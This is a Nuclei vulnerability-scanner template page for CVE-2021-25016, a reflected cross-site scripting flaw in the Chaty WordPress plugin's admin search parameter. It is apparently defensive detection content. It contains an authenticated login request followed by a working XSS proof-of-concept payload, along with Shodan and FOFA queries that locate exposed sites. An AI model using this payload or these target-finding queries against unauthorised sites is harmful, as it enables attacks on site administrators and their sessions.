Skip to content
Nuclei Templates

Chaty < 2.8.2 - Cross-Site Scripting

ID: CVE-2021-25016

Severity: medium

Author: luisfelipe146

Tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio

Description

Section titled “Description”

The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.

YAML Source

Section titled “YAML Source”
id: CVE-2021-25016


info:
  name: Chaty < 2.8.2 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
  remediation: Fixed in 2.8.3
  reference:
    - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25016
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25016
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.43227
    cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: premio
    product: chaty
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/chaty/
    fofa-query: body=/wp-content/plugins/chaty/
    publicwww-query: "/wp-content/plugins/chaty/"
  tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "search=</script><img src onerror=alert(document.domain)>"
          - "chaty_page_chaty"
        condition: and


      - type: word
        part: header
        words:
          - text/html


      - type: status
        status:
          - 200
# digest: 490a0046304402200863f3eb403715c43f6dbad04c631ade0f3f0268290c12f2647ea1563b1693c902202e175f4467e425557f9d146f63ae822173960bc966ac3a2a2f5f547e8f5ec1bb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-25016.yaml"

View on Github